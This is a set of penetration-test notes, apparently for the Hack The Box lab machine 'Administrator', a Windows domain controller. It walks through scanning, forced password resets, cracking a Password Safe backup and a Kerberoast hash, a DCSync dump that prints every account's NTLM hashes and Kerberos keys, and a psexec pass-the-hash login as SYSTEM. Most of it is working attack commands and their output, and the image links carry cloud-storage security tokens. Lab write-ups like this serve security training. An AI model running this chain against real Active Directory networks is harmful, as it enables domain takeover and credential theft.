NOTES

ENUMERATION

### NMAP


```shell
nmap -sV -sC -T3 -p21,53,88,139,389,445,5989 $IP --open -oN files/administrator.nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-31 23:06 CEST
Nmap scan report for 10.10.11.42
Host is up (0.018s latency).
Not shown: 1 closed tcp port (reset)
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-01 04:06:34Z)
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-09-01T04:06:38
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
```


### Full enum done

FOOTHOLD

### Bloodhound next


Path:


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/3d08bb9d-3341-44f6-adb4-3f20aa5647d3/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466STF6QPWV%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082805Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDcPjtsD5zW2Bi2rbz9d%2Fm7uT%2Be6krLV1wyOOqtJTlD0gIgTQ%2BzF78ehRX3AEBs2DEnwhC7VQ9iMj4%2BGO%2Fi640y%2FcMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDH86JFKqS%2FcoDOhrcSrcA7g25pPPTHvQGXc5rXavjwrI2Wz46dN%2F1dv%2FF2cwbCg88TpMkVRcoqTt%2F%2FjX2aYmemPjaWq0mC1nHgU9%2BYu3nLayjvPuXZmVLR3fmz2LMziF1iHQ9T7AQRku0QjGGRC%2Fx52Ufnf%2Ft6Qxi3u0tACtZ0owFe%2Bx1GDXG78IGOh00e1iFQzuulShMU2iJkqf6DDVHYY20Pb713pYLPUFWgmIshKvvvLc1CSYZOYN69zU%2Fym2vLuKb%2Bu5HGjcw4OnfbpW%2BBEEOgZ5r82sWeNRPt%2BwbbuuW%2BLW0HcgvUCK7pFSGkbzYg3l%2BFgtOHZH4ZjaXzWo5NFnW1uLlIqP6C%2FhSkKYHGWYThkJpUhlYUDa8Nn3Q%2BPgxey4br8UCP7Eti%2FccWrbmLex9CYg%2FqBE72EW1qrwPJiF3yjkxKqdubkNvBurNQQ%2Fp8cfsO2xRGEEXOkh7VS4p3AvEihUHSrC3omZeJyNoJqUsxj1zr8NMJC7o%2B0UJxXErgpfQEAxi6OsCGwKSUyrAqhqrlEaCVNFq7tVIBLzvqs9dWSQ6d%2F6etJDezNhcGsswvXBKwqpau%2F7tOXpRkpnKXSGOQoT1CFu1lQ4wITxPe%2FMLbPr3KZv0ZTnxWXGpMXVAvT9NejQGnXHBcsAMPTzuc0GOqUBRo85QwX6APfiV0FL5SBcUnlfhAh1T2er0dvhnckm1Pqtkl%2FlT3y%2FJr6qsUxig7U4YL3BM%2FQQ3UobTBe6rHeb9XsDkHBs6DYiT97r%2BXb0aJ6Dgl90SMLy4YCW52oL3rXzg3YqPrwRZdsx3mL7wlF6GzvfqUnYhwNrUfFYKbwQIRQkQFYz3Tj1OWV5WSxwl8ixWhxJMmHQGhG5gtFk7z4fK%2BcGITjI&X-Amz-Signature=8e61f2c3ed82e16ec07db02c32c7705027e5a049728b4fe4af33fd87c841d1fe&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/87f96f90-efcc-4e33-911c-6bc4009e285e/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466STF6QPWV%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082805Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDcPjtsD5zW2Bi2rbz9d%2Fm7uT%2Be6krLV1wyOOqtJTlD0gIgTQ%2BzF78ehRX3AEBs2DEnwhC7VQ9iMj4%2BGO%2Fi640y%2FcMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDH86JFKqS%2FcoDOhrcSrcA7g25pPPTHvQGXc5rXavjwrI2Wz46dN%2F1dv%2FF2cwbCg88TpMkVRcoqTt%2F%2FjX2aYmemPjaWq0mC1nHgU9%2BYu3nLayjvPuXZmVLR3fmz2LMziF1iHQ9T7AQRku0QjGGRC%2Fx52Ufnf%2Ft6Qxi3u0tACtZ0owFe%2Bx1GDXG78IGOh00e1iFQzuulShMU2iJkqf6DDVHYY20Pb713pYLPUFWgmIshKvvvLc1CSYZOYN69zU%2Fym2vLuKb%2Bu5HGjcw4OnfbpW%2BBEEOgZ5r82sWeNRPt%2BwbbuuW%2BLW0HcgvUCK7pFSGkbzYg3l%2BFgtOHZH4ZjaXzWo5NFnW1uLlIqP6C%2FhSkKYHGWYThkJpUhlYUDa8Nn3Q%2BPgxey4br8UCP7Eti%2FccWrbmLex9CYg%2FqBE72EW1qrwPJiF3yjkxKqdubkNvBurNQQ%2Fp8cfsO2xRGEEXOkh7VS4p3AvEihUHSrC3omZeJyNoJqUsxj1zr8NMJC7o%2B0UJxXErgpfQEAxi6OsCGwKSUyrAqhqrlEaCVNFq7tVIBLzvqs9dWSQ6d%2F6etJDezNhcGsswvXBKwqpau%2F7tOXpRkpnKXSGOQoT1CFu1lQ4wITxPe%2FMLbPr3KZv0ZTnxWXGpMXVAvT9NejQGnXHBcsAMPTzuc0GOqUBRo85QwX6APfiV0FL5SBcUnlfhAh1T2er0dvhnckm1Pqtkl%2FlT3y%2FJr6qsUxig7U4YL3BM%2FQQ3UobTBe6rHeb9XsDkHBs6DYiT97r%2BXb0aJ6Dgl90SMLy4YCW52oL3rXzg3YqPrwRZdsx3mL7wlF6GzvfqUnYhwNrUfFYKbwQIRQkQFYz3Tj1OWV5WSxwl8ixWhxJMmHQGhG5gtFk7z4fK%2BcGITjI&X-Amz-Signature=f1bdaa6f3691ac0f7818025f90af039ee70173e20365effe6775e3a529833ffa&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

PRIVILEGE ESCALATION

### Force Change Password


```shell
❯ net rpc password 'michael' 'Password123!' -U 'administrator/olivia%ichliebedich' -S $IP
❯ net rpc password 'benjamin' 'Password123!' -U 'administrator/michael%Password123!' -S $IP
```


### FTP file found


```shell
❯ nxc ftp $IP -u $USER -p $PASS --ls               
FTP         10.10.11.42     21     10.10.11.42      [+] benjamin:Password123!
FTP         10.10.11.42     21     10.10.11.42      [*] Directory Listing
FTP         10.10.11.42     21     10.10.11.42      10-05-24  09:13AM                  952 Backup.psafe3
```


### Cracked with hashcat


```shell
Backup.psafe3:tekieromucho
```


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/4edff0f9-8b7d-4989-8e04-b58e4fed9057/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466ZEXDM222%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082805Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDJNVvCXoCnrMePHcN03z4CAylsCDosNVu3HPrrGEq6XwIgYPDhW%2BkTpGKoMyh2fj16AZh1yxj7yWiKog9oyggwtEAq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDKAFEFn89aX4t0dyQircA4kbh46wNIlkBHfx82aR5K1BgLbrTEFYo57enE2JaWgYm5A2BmDS%2B7VZpxNtm8cKt0a872bJV25tYBzm9ZUw5hnh32jEyfXFO%2Bxr1KwBh%2FMTEPtYLb3Z8a3oi6ITSo0Tm7gqd9v3s3KbR%2BLV2wUAao%2B9WNfPt8DPkAOEV38V9LvgT8oVfhVam5PWbUjUoXc0Qq%2BqWZFnA6ptICV00KiEBinFZrI9IvnyF8css52uP%2BSDF6jon56qL5MyhlBitM%2BhpsFsYSXPlcuZS4CaqIFA95DUmK9bNyw9A6%2BdDDPqeZ9Qfbs4wdkX8NNDcl95SOkE2MNFziOIPiWw7baFCypVEz5k3DaK8SkSbTC1bAGERM2taz%2BvQST3nzsiOIbHW3g%2BS%2Fqhw4ABg9H%2FjA1wQ%2BFvpThCpDOELJsgJ27akUD3uOj8MNvGQuzQwa8I5zHb8l%2FDOzfSuwNpfvxM9pFPqvMkiYMz1RlV1Nh5SULSnBqC9L%2FnvPQC%2FZItNqE8h1EsxCGelj5kRWEDpsmK7zEDU%2FyhmsdZG0%2FbrApGGnztH1aZjncR9UNmpmgmh%2FAzJFWhaTTt87MjK4n5rOl0Z%2BDZy9eWCmG5yK5HjSWHrQF9aNG9liNPBofeHTCrmqUA2BcZMO7zuc0GOqUBwwzOzaWXliECQjbqrNxZz6Ipj6IAqhCMUtfu4zaoDf4mJ0W3GV%2F8fXrCUUn0MD6MVoMZLKcqa3StOWcOcGJn8d2l7O9aGggxhGLZjeSFCF%2Fp2hzeO3OgJ57oCEzozlSW64RQuHjnGQpVb3EO%2BT6FOSOCVaaJbB%2Fc9xiRu%2BGyj6%2B4ja8H3peEbkuHzANFqi5%2B6UM1srKisvcz9pZVlIkLmaEXcrVO&X-Amz-Signature=daa8e0a1b3aa7e25df5dd1f9bb23bcc5afb20af2e601e289f7792226c0680051&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Lets copy all passwords and do a password spray for auth.


```shell
[+]
 administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
```


### Next path


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/dede4c62-82f1-4b4f-9809-01ae7d0128b8/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466ZEXDM222%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082805Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDJNVvCXoCnrMePHcN03z4CAylsCDosNVu3HPrrGEq6XwIgYPDhW%2BkTpGKoMyh2fj16AZh1yxj7yWiKog9oyggwtEAq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDKAFEFn89aX4t0dyQircA4kbh46wNIlkBHfx82aR5K1BgLbrTEFYo57enE2JaWgYm5A2BmDS%2B7VZpxNtm8cKt0a872bJV25tYBzm9ZUw5hnh32jEyfXFO%2Bxr1KwBh%2FMTEPtYLb3Z8a3oi6ITSo0Tm7gqd9v3s3KbR%2BLV2wUAao%2B9WNfPt8DPkAOEV38V9LvgT8oVfhVam5PWbUjUoXc0Qq%2BqWZFnA6ptICV00KiEBinFZrI9IvnyF8css52uP%2BSDF6jon56qL5MyhlBitM%2BhpsFsYSXPlcuZS4CaqIFA95DUmK9bNyw9A6%2BdDDPqeZ9Qfbs4wdkX8NNDcl95SOkE2MNFziOIPiWw7baFCypVEz5k3DaK8SkSbTC1bAGERM2taz%2BvQST3nzsiOIbHW3g%2BS%2Fqhw4ABg9H%2FjA1wQ%2BFvpThCpDOELJsgJ27akUD3uOj8MNvGQuzQwa8I5zHb8l%2FDOzfSuwNpfvxM9pFPqvMkiYMz1RlV1Nh5SULSnBqC9L%2FnvPQC%2FZItNqE8h1EsxCGelj5kRWEDpsmK7zEDU%2FyhmsdZG0%2FbrApGGnztH1aZjncR9UNmpmgmh%2FAzJFWhaTTt87MjK4n5rOl0Z%2BDZy9eWCmG5yK5HjSWHrQF9aNG9liNPBofeHTCrmqUA2BcZMO7zuc0GOqUBwwzOzaWXliECQjbqrNxZz6Ipj6IAqhCMUtfu4zaoDf4mJ0W3GV%2F8fXrCUUn0MD6MVoMZLKcqa3StOWcOcGJn8d2l7O9aGggxhGLZjeSFCF%2Fp2hzeO3OgJ57oCEzozlSW64RQuHjnGQpVb3EO%2BT6FOSOCVaaJbB%2Fc9xiRu%2BGyj6%2B4ja8H3peEbkuHzANFqi5%2B6UM1srKisvcz9pZVlIkLmaEXcrVO&X-Amz-Signature=85a553c2d0306dcc72d8ae24bf168398a34f4cfe0e8724795109df8477fe455d&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


```shell
❯ targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$109b07aaa1c026b987eb4a9bef825cdf$81d7d55a840b2ab2de5ccb9b79e93b8565b2a1deaa69fdcf7add821d15abf017e5395dc0d67ec393d3bcbe71940d322a543bc486505eecd3ca2f8c013842203c17f29ca4cf2779ead2aa9e35ae96e9fc780f8cacd8eb5e8bd92ef455fe2d083b53f8e83a465da72ead6ad7a26405d5b28ad437d2653583c8afe62d04cca8ab4d0926d51292be2062951c5a39d4a43122131196993c5b632df30c140b49a33a215fc9d37626a69ada3750d5d1f2078eb662d05d46e33950c9d089988cc7634d0664cbb26502aac599ace91daac0608cb700f31f5dba258f73a34fe358ce45de30fc9540770b1e0c743abfff21b2fe85f02ca886c9ca2b45b5d13591eaaa83f368ddbb1fc2e2c5383cf8588af24d77e95bf81624fcbea54ae71cee529c4f354f120ad514e6c5dfce63e320b93d076c0fd32006ff22ff8edc2e23c0119496e1a40b7c951b3ae570f6d6257aa3051daa051adc7e1445a26246f02b79e9203b428e77217c6992b48354d4a05df3dbd2265026685eea9b4fb4b155937bec3a772031d579c025ebb6dffb61376f71028ce2f3ef73610fa6b8d5f2f56bfc9c9db9fc2dc997d43a1847d1202cc318ba15bf52c777a11ba86b878ead9efde4bf301fc2114aef7e0addd4ff04edaba4ae27d1498e69beed501c56a4d6707dac91cb6cc4536b5bf340f8e61f760ff0814468c1ae1fde3def237e26bf9e0b90925bce0f6424aa9796dbfcc01219eb3b0de99dcd65912e4da10fc22617277ee3d434b4597d4214e23cc0a6f2eec179ccdeae8323cb337907e72f7c6581795c9feddbdb44bed59bd83a1aec09a5534251b7ab10f143a34b69fbbef91c6966aefd0d4d8f19e4d11d3d5ece7a70d42c5acc45f1c5490ee72db0ae7aaf19f54f1b6504b4a52c9274d1e900045d165ff2d3f45aaddc78ebba5c1ab86aa80b4e18aa6d2ec9659bb1f7c2e9a499c471a0111c98732e718d5198850adc6ef9f5a856ea084864a119a34248ca79be72a781f9eaece7ddaa3777cb15efe23726fcbbd63aab884b936a976ff6995032e2f4060b77d6129760b030a6702ab1221217e3fc647d6033e6ef26e292117942faea7f9726e969226c4dde134e5501d1b3d423ead40952ca9a3a713bfad2f4ada230ac780c6c24e74660d73b7ac0a8edfb6a03f9069a283503036d9d5471447d5f38c7a4f80901e2351408a8d9202d4def541be9477464552dc5f211dab1b6b227c45075d2e46eacd2fec445d0d2e65159b7a5d569d41bb5ee0246ad3c38b023a08b6ff731b6e64c9dde875d21632743970d19fd55cb693acba287743ed9ad0df1f4f0febefe0932ba9f03ab78dcf51e7d924f20aedcaad628e8e15fdb8ef3a3c85f1ec39d69a5faa907dee75f3f854b391849de3594f2ac23e8286ccc009b866f434b0e4f7e20e06f5b59af95a6fd2f9ef4ed8ad1fb7f0fc0599deb473efc2282a8f45f426f2891d1c4e586d6c308e95110031d660f20230e29629f4d6e1a579e553d713990e74418c9d7ba5ffd14774d7c432f3cd6b9660e2cce17
```


### Cracked with hashcat


```shell
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$109b07aaa1c026b987eb4a9bef825cdf$81d7d55a840b...SNIP...60e2cce17:
limpbizkit
```

- limpbizkit

### DCSync


```shell
❯ secretsdump.py 'administrator.htb'/ethan:limpbizkit@$IP
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:7a206ee05e894781b99a0175a7fe6f7e1242913b2ab72d0a797cc45968451142
administrator.htb\michael:aes128-cts-hmac-sha1-96:b0f3074aa15482dc8b74937febfa9c7e
administrator.htb\michael:des-cbc-md5:2586dc58c47c61f7
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:36cfe045bc49eda752ca34dd62d77285b82b8c8180c3846a09e4cb13468433a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:2cca9575bfa7174d8f3527c7e77526e5
administrator.htb\benjamin:des-cbc-md5:49376b671fadf4d6
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
```

SYSTEM OWNAGE

### Login to get NT/AUTH SYSTEM


```shell
❯ psexec.py $USER@$IP -hashes $FULLHASH
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.42.....
[*] Found writable share ADMIN$
[*] Uploading file vpdxiKca.exe
[*] Opening SVCManager on 10.10.11.42.....
[*] Creating service zBIF on 10.10.11.42.....
[*] Starting service zBIF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

CLEANUP

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

### FILES


### DIRS


### SUBDIRS


### VHOSTS

SCOPE

IP	HOSTNAME	DOMAIN NAME	OS
10.10.11.42	DC	administrator.htb	indows Server 2022 Build 20348 x64

Administrator

NOTES

ENUMERATION

FOOTHOLD

PRIVILEGE ESCALATION

SYSTEM OWNAGE

CLEANUP

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

SCOPE

USERS

CREDENTIALS

NMAP

SMB SHARES

OTHER NOTES

LOGS

ⓒ 0xNRG